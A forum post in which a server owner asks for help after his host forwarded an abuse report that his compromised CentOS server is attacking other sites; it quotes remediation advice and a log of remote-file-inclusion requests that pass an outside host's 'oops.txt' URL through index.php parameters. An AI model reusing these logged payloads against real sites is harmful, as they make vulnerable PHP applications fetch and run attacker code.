Need some help quick please

Need some help quick please

I think my server has been hacked and it’s attacking other servers..

I thought my colo was off the his rocker when he first complained to me yesterday.. Today he got another notification from a different source…

Need an experienced Linux/CentOS server admin to check out my server and correct any issues he/she may find..
======================

NOTES:

This type of attack typically mean the server for which the IP address

of the attacker is bound is a compromised server.

Please check the server behind the IP address above for suspicious

files in /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox,

/var/spool/squid, and /var/spool/cron Please use "ls -lab" for

checking directories as sometimes compromised servers will have hidden

files that a regular "ls" will not show.

Please also check the process tree (ps -efl or ps -auwx) for

suspicious processes; often times the malware / hack pretends to be an

Apache process.

Linux Malware Detect is an excellent program for finding malware on a

server. You can find the latest version at

http://www.rfxn.com/projects/linux-malware-detect/

Clam Anti-virus, clamscan, can also be used to find commonly used PHP

and Perl-based hacks, including various php shells, on a server using

the “–infected” and “–recursive” options.

You may also want to check out using root kit detection tools –

http://www.chkrootkit.org/, http://www.rootkit.nl/, and

http://www.ossec.net/en/rootcheck.html as tools which should be used

in addition to checking the directories and process tree.

### EOF NOTES ###

Please take appropriate action to stop these attacks from happening.

Thank you very much for your time.

Code:

Type of attack:

 

Sample log report including date and time stamp (1st field is the word

"request", 2nd field is the IP address or the domain name being

attacked, and the 3rd field is the IP address or domain name of the

attacker):

 

  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:36 +0000]

"GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-doFQz7pAAADzVrsk "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:48 +0000]

"GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-drFQz7pAAAF0ChVY "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:59 +0000]

"GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"

"-" UK-dt1Qz7pAAADzLoi8 "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:10 +0000]

"GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-dwlQz7pAAADzInIY "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:21 +0000]

"GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-dzVQz7pAAADzFmuE "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:32 +0000]

"GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"

"-" UK-d2FQz7pAAAF1no7s "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:43 +0000]

"GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"

"-" UK-d41Qz7pAAADzdvYM "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:54 +0000]

"GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"

"-" UK-d7lQz7pAAADywcZ0 "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:05 +0000]

"GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-d@VQz7pAAADy9lTA "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:16 +0000]

"GET /index.php?open=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-eBFQz7pAAADzfwII "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:58:53 +0000] "GET

/index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jjVQz7pAAAGMpHwk "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:58:53

+0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jjVQz7pAAAGM3K@A "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:05 +0000] "GET

/index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jmVQz7pAAABz8XSc "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:06

+0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jmlQz7pAAABx2DqI "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:17 +0000] "GET

/index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jpVQz7pAAAGMpHww "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:17

+0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jpVQz7pAAABx8GVM "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:29 +0000] "GET

/index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jsVQz7pAAADzPqGw "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:29

+0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jsVQz7pAAADzSqfc "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:40 +0000] "GET

/index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jvFQz7pAAABx4Ebg "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:40

+0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jvFQz7pAAAByOINM "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:51 +0000] "GET

/index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jx1Qz7pAAABx2Dqw "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:51

+0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jx1Qz7pAAAGMrI-U "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:21:00:03 +0000] "GET

/index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-j01Qz7pAAAGMrI-c "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:03

+0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-j01Qz7pAAAGMpHxM "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:21:00:15 +0000] "GET

/index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-j31Qz7pAAAGMpHxU "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:15

+0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-j31Qz7pAAABx2DrI "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:21:00:27 +0000] "GET

/index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-j61Qz7pAAADzKodQ "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:28

+0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-j7FQz7pAAADzFm8I "-"


TIA

Ed

Comments are closed.